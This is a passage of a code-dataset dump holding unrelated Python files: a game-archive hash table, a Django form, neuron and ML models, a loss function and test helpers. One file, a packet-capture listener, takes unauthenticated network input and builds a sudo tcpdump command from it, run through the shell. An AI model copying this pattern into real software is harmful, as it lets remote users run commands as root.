ValueError(f\"Basename '{entry.name}' appears in multiple BND entry paths.\")\n entries[entry.name] = entry\n return entries\n\n @property\n def entry_count(self) -> int:\n return len(self._entries)\n\n @property\n def has_repeated_entry_names(self):\n entry_names = [e.name for e in self.entries]\n return len(set(entry_names)) < len(entry_names)\n\n def __getitem__(self, id_or_path_or_basename) -> BinderEntry:\n \"\"\"Shortcut for access by ID (int) or path (str) or basename (str).\n\n If the path of one entry is the basename of another entry, the former will be given precedence here, but this\n should never happen.\n \"\"\"\n if isinstance(id_or_path_or_basename, int):\n return self.entries_by_id[id_or_path_or_basename]\n elif isinstance(id_or_path_or_basename, str):\n try:\n return self.entries_by_path[id_or_path_or_basename]\n except KeyError:\n return self.entries_by_basename[id_or_path_or_basename]\n raise TypeError(\"`BND` key should be an entry ID (int) or path/basename (str).\")\n\n def __iter__(self) -> tp.Iterator[BinderEntry]:\n return iter(self._entries)\n\n def __len__(self):\n return len(self._entries)\n\n\nclass BinderHashTable:\n\n HASH_TABLE_HEADER = BinaryStruct(\n \"8x\",\n (\"path_hashes_offset\", \"q\"),\n (\"hash_group_count\", \"I\"),\n (\"unknown3\", \"i\", 0x00080810),\n )\n PATH_HASH_STRUCT = BinaryStruct(\n (\"hashed_value\", \"I\"),\n (\"entry_index\", \"i\"),\n )\n HASH_GROUP_STRUCT = BinaryStruct(\n (\"length\", \"i\"),\n (\"index\", \"i\"),\n )\n\n @classmethod\n def build_hash_table(cls, entries):\n \"\"\" Some BND4 resources include tables of hashed entry paths, which aren't needed to read file contents, but\n need to be re-hashed to properly pack the file in case any paths have changed (or the number of entries). \"\"\"\n\n # Group count set to first prime number greater than or equal to the number of entries divided by 7.\n for p in range(len(entries) // 7, 100000):\n if cls.is_prime(p):\n group_count = p\n break\n else:\n raise ValueError(\"Hash group count could not be determined.\")\n\n hashes = []\n hash_lists = [[] for _ in range(group_count)] # type: tp.List[tp.List[tp.Tuple[int, int]], ...]\n\n for entry_index, entry in enumerate(entries):\n hashes.append(cls.path_hash(entry.path))\n list_index = hashes[-1] % group_count\n hash_lists[list_index].append((hashes[-1], entry_index))\n\n for hash_list in hash_lists:\n hash_list.sort() # Sort by hash value.\n\n hash_groups = []\n path_hashes = []\n\n total_hash_count = 0\n for hash_list in hash_lists:\n first_hash_index = total_hash_count\n for path_hash in hash_list:\n path_hashes.append({\"hashed_value\": path_hash[0], \"entry_index\": path_hash[1]})\n total_hash_count += 1\n hash_groups.append({\"index\": first_hash_index, \"length\": total_hash_count - first_hash_index})\n\n packed_hash_groups = cls.HASH_GROUP_STRUCT.pack_multiple(hash_groups)\n packed_hash_table_header = cls.HASH_TABLE_HEADER.pack(\n path_hashes_offset=cls.HASH_TABLE_HEADER.size + len(packed_hash_groups), hash_group_count=group_count,\n )\n packed_path_hashes = cls.PATH_HASH_STRUCT.pack_multiple(path_hashes)\n\n return packed_hash_table_header + packed_hash_groups + packed_path_hashes\n\n @staticmethod\n def path_hash(path_string: str):\n \"\"\"Simple string-hashing algorithm used by FROM.\n\n Strings use forward-slash path separators and always start with a forward slash.\n \"\"\"\n hashable = path_string.replace(\"\\\\\", \"/\")\n if not hashable.startswith(\"/\"):\n hashable = \"/\" + hashable\n h = 0\n for i, s in enumerate(hashable):\n h += i * 37 + ord(s)\n return h\n\n @staticmethod\n def is_prime(p):\n if p < 2:\n return False\n if p == 2:\n return True\n if (p % 2) == 0:\n return False\n for i in range(3, p // 2, 2):\n if (p % i) == 0:\n return False\n if i ** 2 > p:\n return True\n return True\n","sub_path":"soulstruct/containers/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":15869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"127811850","text":"from django import forms\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.utils.safestring import mark_safe\nfrom .models import CourseType\nfrom .models import CourseAttendee\nfrom .models import Attendee\nfrom captcha.fields import CaptchaField\n\n\nclass RegistrationForm(forms.Form):\n\n captcha = CaptchaField(help_text=\"Opište text na obrázku.\")\n\n name = forms.CharField(\n label=_('Jméno a příjmení'), max_length=255,\n help_text=\"\"\"Jméno a příjmení včetně titulů.\"\"\")\n\n email_attendee = forms.EmailField(\n label=_('E-mail účastníka'),\n help_text='''Prostřednictvím tohoto e-mailu s Vámi\n budeme řešit organizační záležitosti kurzu.''')\n\n organisation = forms.CharField(\n required=False, max_length=100, label=_('Organizace'))\n\n street = forms.CharField(label=_('Ulice a číslo popisné'),\n max_length=50)\n\n city = forms.CharField(label=_('Město'), max_length=50)\n\n zip_code = forms.CharField(label=_('PSČ'), max_length=10)\n\n ico = forms.CharField(label=_('IČ'), required=False, max_length=12)\n\n dic = forms.CharField(label=_('DIČ'), required=False, max_length=16)\n\n order = forms.CharField(label=_('Číslo objednávky'), required=False,\n max_length=16)\n\n invoicemail = forms.EmailField(\n label=_('Fakturační e-mail'), required=False,\n help_text=\"Pokud se liší od e-mailu účastníka.\")\n\n student = forms.BooleanField(\n required=False,\n label=_('Student'),\n help_text=\"Prohlašuji čestně, že jsem student zapsaný v denním studijním programu.\")\n\n level = forms.ChoiceField(\n label=_('V oblasti GIS se považuji za'),\n choices=CourseAttendee.level_choices\n )\n\n topics = forms.CharField(\n label=_('Témata na tento kurz'), required=False,\n widget=forms.Textarea,\n help_text=\"Máte nějaké téma, které byste rádi na kurzu probrali?\")\n\n next_topics = forms.CharField(\n label=_('Témata na další kurzy'), required=False,\n widget=forms.Textarea,\n help_text=\"Zajímá Vás nějaký širší okruh, na který jsme zatím nevypsali školení?\")\n\n note = forms.CharField(\n label=_('Poznámka pro organizátory'), required=False,\n widget=forms.Textarea,\n help_text=\"Cokoliv nám chcete sdělit.\")\n\n gdpr = forms.BooleanField(\n label=Attendee.gdpr_label,\n help_text=Attendee.gdpr_text)\n\n marketing = forms.BooleanField(\n required=False,\n label=Attendee.marketing_label,\n help_text=Attendee.marketing_text)\n\n contact_fieldset = (name, email_attendee)\n","sub_path":"registration/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"128950522","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 20 20:36:58 2015\n\n@author: Tanguy\n\"\"\"\n\n#%% Libraries\nfrom math import exp\nimport numpy as np\n\nfrom methods import euler, rungeKutta\nimport matplotlib.pyplot as plt\n\n#%% Constants\ngNa, gK, gL, ENa, EK, EL = 120, 36, .3, 115, -12, 10.6\nI = 10\n\n#%% Function used for approximation\nfunc = euler\n\n#%% Time set up\ntimeStep = 0.01\ntimeStart = 0\ntimeStop = 200\n\ninterval = np.arange(timeStart, timeStop+timeStep, timeStep)\n\n#%% Targets set up\nv = np.zeros(len(interval))\nm = np.zeros(len(interval))\nn = np.zeros(len(interval))\nh = np.zeros(len(interval))\n\n#%% Targets initialization\nm[0], n[0], h[0] = 0.05, 0.6, 0.32\nv[0] = -15\n\n#%%\ndef computeGreeks(v):\n alphaM = (2.5 - 0.1 * v) / (exp(2.5 - 0.1 * v) - 1)\n betaM = 4 * exp(-1 * v / 18)\n \n alphaN = (0.1 - 0.01 * v) / (exp(1 - 0.1 * v) - 1)\n betaN = 0.125 * exp(-1 * v / 80)\n \n alphaH = 0.07 * exp(-1 * v / 20)\n betaH = 1 / (exp(3 - 0.1 * v) + 1)\n \n return alphaM, betaM, alphaN, betaN, alphaH, betaH\n\n#%%\ndef computeFlows(v, m, n, h, timeStep):\n \n alphaM, betaM, alphaN, betaN, alphaH, betaH = computeGreeks(v)\n \n m1 = (alphaM * (1 - m) - betaM * m)\n n1 = (alphaN * (1 - n) - betaN * n)\n h1 = (alphaH * (1 - h) - betaH * h)\n \n m = func(m, m1, timeStep)\n n = func(n, n1, timeStep)\n h = func(h, h1, timeStep)\n \n return m, n, h\n\n#%%\ndef stepUpdate(v, m, n, h, timeStep):\n m, n, h = computeFlows(v, m, n, h, timeStep)\n\n IK = gNa * m**3 * h * (v - ENa) + gK * n **4 * (v - EK) + gL * (v - EL)\n v1 = I - IK\n\n v = func(v, v1, timeStep)\n \n return v, m, n, h\n \n#%%\nfor t in xrange(1, len(interval)):\n v[t], m[t], n[t], h[t] = stepUpdate(v[t-1], m[t-1], n[t-1], h[t-1], timeStep)\n\n#%%\nplt.plot(interval, v , 'b')\nplt.show()\n\n","sub_path":"Lab 1/Hodgkin-Huxley.py","file_name":"Hodgkin-Huxley.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"394590970","text":"#!/usr/bin/python3\n\nimport json\nimport datetime\n\n\ndef compute_and_normalize_domains_bias(dom2users:dict, seeds:list) -> dict:\n\ts_users = []\n\tfor s in seeds:\n\t\ts_users.append(set(dom2users[s]))\n\n\tmax_bias = 0\n\tdom2bias = {}\n\tfor dom, d_users in dom2users.items():\n\t\tif dom in seeds: continue\n\t\tbias = 0\n\t\tfor s in s_users:\n\t\t\tsimilarity = len(s & set(d_users))\n\t\t\tif similarity>bias: bias = similarity\n\t\tdom2bias[dom] = bias\n\t\tif bias>max_bias: max_bias=bias\n\n\tfor dom in dom2bias.keys():\n\t\tdom2bias[dom] /= max_bias\n\n\treturn dom2bias\n\n\nif __name__ == '__main__':\n\tprint(datetime.datetime.now())\n\twith open('dataset/seed_domains.json', 'r') as seeds_file:\n\t\tseeds = json.loads(seeds_file.read())\n\t\n\twith open('dataset/295k_min_0/dom2users.json', 'r') as doms_file:\n\t\tdom2users = json.loads(doms_file.read())\n\n\tdom2bias = compute_and_normalize_domains_bias(dom2users, seeds)\n\n\twith open('dataset/295k_min_0/dom2bias.json', 'w') as bias_file:\n\t\tbias_file.write(json.dumps(dom2bias))\n\tprint(datetime.datetime.now())\n\t\t","sub_path":"bias.py","file_name":"bias.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"173236365","text":"from cinline import inline\nfrom array import array\nfrom random import shuffle\n\ndef main():\n data = array('h', range(10000));\n shuffle(data)\n\n inline(\n '#include ',\n r'''\n int64 len = python->getint64(\"len(data)\");\n short* data = (short*)python->getwriteptr(\"data\");\n\n // gcc supports nested functions\n int compare(const void* pa, const void* pb) {\n short aa = *(short*)pa;\n short bb = *(short*)pb;\n if (aa < bb) return -1;\n if (aa > bb) return +1;\n return 0;\n }\n\n qsort(data, len, sizeof(short), compare);\n '''\n )\n for ii in range(10000):\n assert data[ii] == ii\n \n\nif __name__ == '__main__':\n import sys\n main(*sys.argv[1:])\n\n\n","sub_path":"unit/nestedfun.py","file_name":"nestedfun.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"433253426","text":"from tensorflow import keras\r\nfrom PIL import Image\r\nimport numpy as np\r\n\r\nclass mlmodel():\r\n\tdef __init__(self):\r\n\t\tself.team = \"Los voladores de Papantla\"\r\n\t\tself.name = \"Hentai Lover De Durango\"\r\n\t\tself.model = keras.models.load_model(\"Aver128.model\",compile=False)\r\n\t\tself.labels = [\"Apple\",\"Banana\",\"Orange\",\"Mixed\"]\r\n\r\n\tdef predict(self,path = \"Appleasa.jpg\"):\r\n\t\ttop,right,bottom,left = (0,0,0,0)\r\n\t\tcoords = (top,right,bottom,left)\r\n\r\n\t\ttry:\r\n\t\t\tim = Image.open(path).convert('L')\r\n\t\t\tim = im.resize((128,128))\r\n\t\t\tnp_im = np.array(im) # convert to array\r\n\t\t\tnp_im = np_im.reshape(-1,128,128,1)\r\n\r\n\t\t\tprediction = self.model.predict(np_im)\r\n\t\t\tpredicted_fruits = []\r\n\t\t\tfor i in range(0,4):\r\n\t\t\t\tpredicted_fruits.append((self.labels[i],prediction[0,i],coords))\r\n\t\t\treturn predicted_fruits\r\n\t\texcept:\r\n\t\t\treturn None\r\n","sub_path":"mlmodel128.py","file_name":"mlmodel128.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"309427078","text":"import multiprocessing.pool\r\nimport os\r\nimport time\r\nimport sys\r\n\r\n#want each lineto read \"/a/b/c/file.root\" \"/d/e/f/file2.root\"\r\nfname = sys.argv[1] \r\nRunNumber = sys.argv[2]\r\ncontent_array = []\r\n\r\nwith open(fname) as f:\r\n\t#Content_list is the list that contains the read lines. \r\n\tfor line in f:\r\n\t\t\tline = line.strip() #removes the newline character insereted by append which messses up how this code creates the .sh\r\n\t\t\tif line:\r\n\t\t\t\tcontent_array.append(line) \r\n\tprint(content_array)\r\n\r\ncommands = []\r\nfor rootfiles in range(len(content_array)):\r\n\r\n\tsubmit_command = \"hadd \" + \"MergedTracksandRXNPlane_\" + str(RunNumber) + \"_\" + str(rootfiles) + \".root\" + \" \" + str(content_array[rootfiles])\r\n\tcommands.append(submit_command)\r\n\t# os.system(submit_command)\r\n\r\nworkchunks = os.cpu_count()\r\nwith multiprocessing.pool.Pool(workchunks) as p:\r\n\tcount = 1\r\n\tfor job in p.imap_unordered(os.system, commands, chunksize=workchunks):\r\n\t\tprint(\"Job {}/{} completed\".format(count, len(commands)))\r\n\t\tcount += 1","sub_path":"Parallelization_Software/Merging_Track_and_RXN/HADD_Tracks_and_RXN_Plane.py","file_name":"HADD_Tracks_and_RXN_Plane.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"135837888","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated by PyCharm.\n\n@Date : Wed Dec 18 2019 \n@Time : 23:15:53\n@File : dual_focal_loss.py.py\n@Author : alpha\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom ..registry import LOSSES\n\n\ndef dual_focal_loss_old(pred, label, reduction='mean', avg_factor=None):\n \"\"\"\n :param pred:\n :param label:\n :param reduction:\n :param avg_factor:\n :return:\n \"\"\"\n assert reduction in ['none', 'mean', 'sum']\n label = label.type_as(pred)\n loss = torch.abs(label - pred.sigmoid()) + F.binary_cross_entropy_with_logits(pred, label, reduction='none')\n if reduction == 'none':\n return loss\n elif reduction == 'mean':\n if avg_factor is None:\n return loss.mean()\n else:\n return loss.sum() / avg_factor\n else:\n return loss.sum()\n\n\ndef dual_focal_loss_proto(pred, label, reduction='mean', avg_factor=None):\n \"\"\"\n :param pred: logits\n :param label: 0~1 floats\n :param reduction: 'none', 'sum', 'mean'\n :param avg_factor:\n :return: loss\n dfl = abs(label - pred.sigmoid()) - log(1 - abs(label - pred.sigmoid()))\n \"\"\"\n assert reduction in ['none', 'mean', 'sum']\n label = label.type_as(pred)\n pred_sigmoid = pred.sigmoid()\n l1 = torch.abs(label - pred_sigmoid)\n loss = l1 - (1.0 - l1).log()\n if reduction == 'none':\n return loss\n elif reduction == 'mean':\n if avg_factor is None:\n return loss.mean()\n else:\n return loss.sum() / avg_factor\n else:\n return loss.sum()\n\n\ndef dual_focal_loss(pred, label, reduction='mean', avg_factor=None):\n \"\"\"\n :param pred: logits\n :param label: 0~1 floats\n :param reduction: 'none', 'sum', 'mean'\n :param avg_factor:\n :return: loss\n dfl = abs(label - pred.sigmoid()) - log(1 - abs(label - pred.sigmoid()))\n \"\"\"\n assert reduction in ['none', 'mean', 'sum']\n label = label.type_as(pred)\n pred_sigmoid = pred.sigmoid()\n l1 = torch.abs(label - pred_sigmoid)\n sigmoid_inv = 1.0 + (-pred).exp()\n item = torch.where(label > pred_sigmoid,\n sigmoid_inv * (1 - label) + 1,\n sigmoid_inv * (1 + label) - 1)\n loss = l1 - item.log() + sigmoid_inv.log()\n if reduction == 'none':\n return loss\n elif reduction == 'mean':\n if avg_factor is None:\n return loss.mean()\n else:\n return loss.sum() / avg_factor\n else:\n return loss.sum()\n\n\ndef _random_mask(tensor, percent):\n assert percent > 0\n return (torch.rand_like(tensor) < percent).float()\n\n\ndef balanced_dual_focal_loss(pred, label, neg_pos_ratio=4, least_neg_pct=0.05, reduction='mean'):\n assert reduction in ['none', 'mean', 'sum']\n label = label.type_as(pred)\n mask_pos = (label > 0).float()\n rand_pct = mask_pos.sum() / mask_pos.nelement()\n neg_pct = (rand_pct * (neg_pos_ratio + 1)).clamp(least_neg_pct)\n mask = 1.0 + ((_random_mask(label, neg_pct) + mask_pos) > 0).float()\n mask /= mask.mean()\n loss = dual_focal_loss(pred, label, reduction='none') * mask\n if reduction == 'none':\n return loss\n elif reduction == 'mean':\n return loss.mean()\n else:\n return loss.sum()\n\n\n@LOSSES.register_module\nclass DualFocalLoss(nn.Module):\n\n def __init__(self,\n balance_sample=True,\n neg_pos_ratio=4,\n least_neg_pct=0.05,\n use_one_hot_label=True,\n num_classes=81,\n reduction='mean',\n loss_weight=1.0):\n super(DualFocalLoss, self).__init__()\n self.balance_sample = balance_sample\n self.neg_pos_ratio = neg_pos_ratio\n self.least_neg_pct = least_neg_pct\n self.use_one_hot_label = use_one_hot_label\n self.num_classes = num_classes\n self.reduction = reduction\n if self.use_one_hot_label:\n self.loss_weight = loss_weight * (num_classes - 1)\n else:\n self.loss_weight = loss_weight\n\n def forward(self, pred, label,\n weight=None,\n avg_factor=None,\n reduction_override=None):\n assert reduction_override in (None, 'none', 'mean', 'sum')\n reduction = (reduction_override if reduction_override else self.reduction)\n if self.use_one_hot_label:\n pred = pred.flatten()\n label = F.one_hot(label, num_classes=self.num_classes)[..., 1:].flatten()\n if self.balance_sample:\n return self.loss_weight * balanced_dual_focal_loss(\n pred, label,\n neg_pos_ratio=self.neg_pos_ratio,\n least_neg_pct=self.least_neg_pct,\n reduction=reduction\n )\n else:\n return self.loss_weight * dual_focal_loss(\n pred, label,\n reduction=reduction,\n avg_factor=avg_factor\n )","sub_path":"mmdet/models/losses/dual_focal_loss.py","file_name":"dual_focal_loss.py","file_ext":"py","file_size_in_byte":4991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"9862066","text":"import numpy as np \nallwalks = []\ndef recursiveWalk(x, y, j, this_list):\n # x and y are the coordinates of the starting point.\n # j is the number of steps left.\n # x and y are positive integers.\n Total = 0\n # Add the current point to list.\n # this_list.append([x,y])\n if j == 0:\n # Successfully reached a self-avoiding walk of the desired length\n #if len(this_list) == len(set(this_list)): \n # z = this_list.count([2,2])\n # if z <= 2: \n Total = Total + 1\n allwalks.append(this_list)\n else: # Check what directions are possible to continue walking\n if j: # At the beginning \n # start off with all vertices having a value of 0\n lattice = np.zeros([x+y+1, x+y+1]) \n # let the starting vertex have a value of 1\n for i in range(len(this_list)):\n lattice[this_list[i][0], this_list[i][1]] = 1\n this_list.append([x,y])\n print(this_list)\n #if lattice[x, y] < 2:\n # lattice[x, y] = lattice[x, y] + 1\n # recursiveWalk(x, y, j - 1, this_list[:])\n if lattice[x + 1, y] < 2:\n lattice[x + 1, y] = lattice[x + 1, y] + 1\n this_list.append([x + 1, y])\n # print(this_list)\n recursiveWalk(x + 1, y, j - 1, this_list[:])\n if lattice[x - 1, y] < 2:\n lattice[x - 1, y] = lattice[x - 1, y] + 1\n this_list.append([x - 1, y])\n #print(this_list)\n recursiveWalk(x - 1, y, j - 1, this_list[:])\n if lattice[x, y + 1] < 2:\n lattice[x, y + 1] = lattice[x, y + 1] + 1\n this_list.append([x, y + 1])\n #print(this_list)\n recursiveWalk(x, y + 1, j - 1, this_list[:]) \n if lattice[x, y - 1] < 2:\n lattice[x, y - 1] = lattice[x, y - 1] + 1\n this_list.append([x, y - 1])\n #print(this_list)\n recursiveWalk(x, y - 1, j - 1, this_list[:])\n\n# example \n# x and y must be greater than or equal to j.\n# j - number of steps\n# x,y is the starting point.\nrecursiveWalk(2,2,2,[])\n# length of walk\nprint(\"Number of total walks: \", len(allwalks))\nprint(\"\\nThe walks: \")\n# print each walk\nfor i in range(len(allwalks)):\n print(allwalks[i])\n","sub_path":"L.py","file_name":"L.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"40822393","text":"import traceback\r\nimport json\r\nimport socket\r\nimport time\r\nimport subprocess\r\nclass listenfrom(object):\r\n def __init__(self):\r\n self.host = ''\r\n self.port = 5000\r\n self.sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n self.sock.bind((self.host,self.port))\r\n self.sock.listen(10)\r\n def getinfo(self):\r\n while True:\r\n self.conn, self.addr=self.sock.accept()\r\n self.data=self.conn.recv(4096)\r\n if (self.data.split(',')[0].strip() == 'CAP'):\r\n self.time = time.strftime(\"%Y%m%d%H%M%S\", time.localtime(time.time()))\r\n if self.data.split(',')[1].strip() == '':\r\n self.srcadd = ''\r\n else: \r\n self.srcadd = 'src net '+self.data.split(',')[1].strip()+' and '\r\n if self.data.split(',')[2].strip() == '':\r\n self.srcport = ''\r\n else:\r\n self.srcport = 'src portrange '+self.data.split(',')[2].strip()+' and '\r\n if self.data.split(',')[3].strip() == '':\r\n self.dstadd = ''\r\n else:\r\n self.dstadd = 'dst net '+self.data.split(',')[3].strip()\r\n if self.data.split(',')[4].strip() == '':\r\n self.dstport = ''\r\n else: \r\n self.dstport = ' and dst portrange '+self.data.split(',')[4].strip()\r\n if self.data.split(',')[5].strip() == '':\r\n self.count = '200'\r\n else:\r\n self.count = self.data.split(',')[5].strip()\r\n self.capture = 'sudo timeout 60 tcpdump -i any -s 0 '+self.srcadd+self.srcport+self.dstadd+self.dstport+' -c '+self.count+' -w '+'/tmp/'+self.time\r\n self.syntax = 'The Syntax is --- sudo timeout 60 tcpdump -i any -s 0 '+self.srcadd+self.srcport+self.dstadd+self.dstport+' -c '+self.count+' , The filename is --- '+self.time+' in '+str(setting['region'])+'/'+str(setting['idc'])+' folder '\r\n self.conn.sendall(self.syntax)\r\n self.conn.close()\r\n self.cap = subprocess.Popen(self.capture, shell=True)\r\n self.cap.wait()\r\n self.target = 'sudo scp /tmp/'+self.time+' username@target-address:/tmp/capture/'+str(setting['region'])+'/'+str(setting['idc'])\r\n self.send = subprocess.Popen(self.target, shell=True)\r\n self.send.wait()\r\n self.conn.close()\r\n#Define the main function\r\nif __name__ == '__main__':\r\n f = open(\"/home/ops/wuwh/Settings.json\")\r\n setting = json.load(f)\r\n f.close()\r\n capture = listenfrom()\r\n capture.getinfo()","sub_path":"20180511CAP.py","file_name":"20180511CAP.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"274324536","text":"#!/usr/bin/env python\n\nfrom datetime import datetime\n\nfrom celery.contrib.abortable import AbortableTask\nfrom django.conf import settings\nfrom livesettings import config_value\n\nfrom panda import solr\nfrom panda.utils.mail import send_mail\n\nSOLR_ADD_BUFFER_SIZE = 500\n\nclass ImportFileTask(AbortableTask):\n \"\"\"\n Base type for file import tasks. \n \"\"\"\n abstract = True\n\n # All subclasses should be within this namespace\n name = 'panda.tasks.import'\n\n def task_start(self, task_status, message):\n \"\"\"\n Mark that task has begun.\n \"\"\"\n task_status.status = 'STARTED' \n task_status.start = datetime.utcnow()\n task_status.message = message \n task_status.save()\n\n def task_update(self, task_status, message):\n \"\"\"\n Update task status message.\n \"\"\"\n task_status.message = message \n task_status.save()\n\n def task_abort(self, task_status, message):\n \"\"\"\n Mark that task has aborted.\n \"\"\"\n task_status.status = 'ABORTED'\n task_status.end = datetime.utcnow()\n task_status.message = message\n task_status.save()\n\n def task_complete(self, task_status, message):\n \"\"\"\n Mark that task has completed.\n \"\"\"\n task_status.status = 'SUCCESS'\n task_status.end = datetime.utcnow()\n task_status.message = message\n task_status.save()\n\n def task_exception(self, task_status, message, formatted_traceback):\n \"\"\"\n Mark that task raised an exception\n \"\"\"\n task_status.status = 'FAILURE'\n task_status.end = datetime.utcnow()\n task_status.message = message \n task_status.traceback = formatted_traceback\n task_status.save()\n\n def run(self, dataset_slug, upload_id, *args, **kwargs):\n \"\"\"\n Execute import.\n \"\"\"\n raise NotImplementedError() \n\n def after_return(self, status, retval, task_id, args, kwargs, einfo):\n \"\"\"\n Save final status, results, etc.\n \"\"\"\n from panda.models import Dataset, Notification\n\n dataset = Dataset.objects.get(slug=args[0])\n task_status = dataset.current_task \n\n if einfo:\n self.task_exception(\n task_status,\n 'Import failed',\n u'\\n'.join([einfo.traceback, unicode(retval)])\n )\n \n email_subject = 'Import failed: %s' % dataset.name\n email_message = 'Import failed: %s:\\n\\nhttp://%s/#dataset/%s' % (dataset.name, config_value('DOMAIN', 'SITE_DOMAIN'), dataset.slug)\n notification_message = 'Import failed: %s' % dataset.name\n notification_type = 'Error'\n elif self.is_aborted():\n email_subject = 'Import aborted: %s' % dataset.name\n email_message = 'Import aborted: %s:\\n\\nhttp://%s/#dataset/%s' % (dataset.name, config_value('DOMAIN', 'SITE_DOMAIN'), dataset.slug)\n notification_message = 'Import aborted: %s' % dataset.name\n notification_type = 'Info'\n else:\n self.task_complete(task_status, 'Import complete')\n \n email_subject = 'Import complete: %s' % dataset.name\n email_message = 'Import complete: %s:\\n\\nhttp://%s/#dataset/%s' % (dataset.name, config_value('DOMAIN', 'SITE_DOMAIN'), dataset.slug)\n notification_message = 'Import complete: %s' % dataset.name\n notification_type = 'Info'\n \n if task_status.creator:\n Notification.objects.create(\n recipient=task_status.creator,\n related_task=task_status,\n related_dataset=dataset,\n message=notification_message,\n type=notification_type\n )\n\n send_mail(email_subject, email_message, [task_status.creator.username])\n\n # If import failed, clear any data that might be staged\n if task_status.status == 'FAILURE':\n solr.delete(settings.SOLR_DATA_CORE, 'dataset_slug:%s' % args[0], commit=True)\n\n","sub_path":"panda/tasks/import_file.py","file_name":"import_file.py","file_ext":"py","file_size_in_byte":4132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"197330744","text":"from __future__ import absolute_import, print_function, unicode_literals\n\nfrom datetime import datetime, timedelta\nfrom os import utime\nfrom re import compile as regex\nfrom six.moves import zip_longest\nfrom tempfile import NamedTemporaryFile\nfrom unittest import TestCase as _TestCase\n\n\nclass TestCase(_TestCase):\n def assert_are_true(self, actual):\n self._assert_all_are(True, actual)\n\n def assert_are_false(self, actual):\n self._assert_all_are(False, actual)\n\n def _assert_all_are(self, expected, actual):\n from itertools import repeat\n actual = tuple(actual)\n l = actual.__len__()\n expected = repeat(expected, l)\n self.assert_are(expected, actual)\n\n def assert_are(self, expected, actual):\n from operator import is_\n self._are(is_, expected, actual)\n\n def assert_are_eq(self, expected, actual):\n from operator import eq\n self._are(eq, expected, actual)\n\n def assert_are_eq_strict(self, expected, actual, true=True):\n unique = object()\n z = zip_longest(expected, actual, fillvalue=unique)\n z = tuple(z)\n len_ = z.__len__()\n types_are = tuple((e.__class__ is a.__class__) for e, a in z)\n values_are = tuple((e == a) for e, a in z)\n expected = (True,) * len_, (true,) * len_\n actual = types_are, values_are\n self.assertEqual(expected, actual)\n\n def _are(self, op, expected, actual):\n expected = tuple(expected)\n _0 = (True,) * expected.__len__()\n _1 = self.cmp(op, expected, actual)\n self.assertEqual(_0, _1)\n\n @staticmethod\n def cmp(op, expected, actual):\n unique = object()\n z = zip_longest(expected, actual, fillvalue=unique)\n z = tuple(z)\n return tuple(op(p, q) for p, q in z)\n\n @staticmethod\n def args(*args):\n return map(str, args)\n","sub_path":"pypeline/test/yobj/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"267718038","text":"import os\nimport tensorflow as tf\nfrom tensorflow.contrib import rnn\nimport numpy as np\nimport sys\n\nfrom hybrid_data_provider import data_provider\nfrom tensorflow.contrib import learn\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' \n\n\n# Parameters\nlearning_rate = float(sys.argv[8])\nmy_droup_out = float(sys.argv[9])\nbatch_size = 200\nnumber_of_post_per_user = int(sys.argv[2])\ntrain_iteration = int(sys.argv[3])\nn_word_embedding = int(sys.argv[5])\nn_letter_embedding = int(sys.argv[7])\n\n# Network Parameters\nn_sent_words = 100 \nn_sent_letters = 600 \nn_word_hidden = int(sys.argv[4]) # hidden layer num of features\nn_letter_hidden = int(sys.argv[6])\nn_classes = int(sys.argv[1])\n\ndp = data_provider(size=n_classes, sent_max_len = n_sent_words, sent_max_char_len = n_sent_letters, number_of_post_per_user = number_of_post_per_user)\n\n# tf Graph input\nx = tf.placeholder(tf.int32, [None, n_sent_words])\nu = tf.placeholder(tf.int32, [None, n_sent_letters])\n\ny = tf.placeholder(tf.float32, [None, n_classes])\n\nword_dropout = tf.placeholder(tf.float32, shape=())\n\nis_training = tf.placeholder(tf.bool)\n\n# Define weights\nweights = {\n 'inner':tf.Variable(tf.random_normal([2*n_word_hidden + n_letter_hidden, 128])),\n 'out': tf.Variable(tf.random_normal([128, n_classes]))\n}\nbiases = {\n 'out': tf.Variable(tf.random_normal([n_classes])),\n 'inner': tf.Variable(tf.random_normal([128]))\n}\n\n\ndef RNN(x, u, weights, biases, dropout, is_training):\n\n with tf.variable_scope(\"word\"):\n x = tf.cond(tf.equal(is_training, tf.constant(True)), lambda: tf.nn.dropout(x, dropout), lambda:x)\n # Unstack to get a list of 'n_steps' tensors of shape (batch_size, n_sent_words)\n x = tf.unstack(x, n_sent_words, 1)\n # Define a lstm cell with tensorflow\n fw_lstm_cell = rnn.BasicLSTMCell(n_word_hidden)\n bw_lstm_cell = rnn.BasicLSTMCell(n_word_hidden)\n\n outputs, 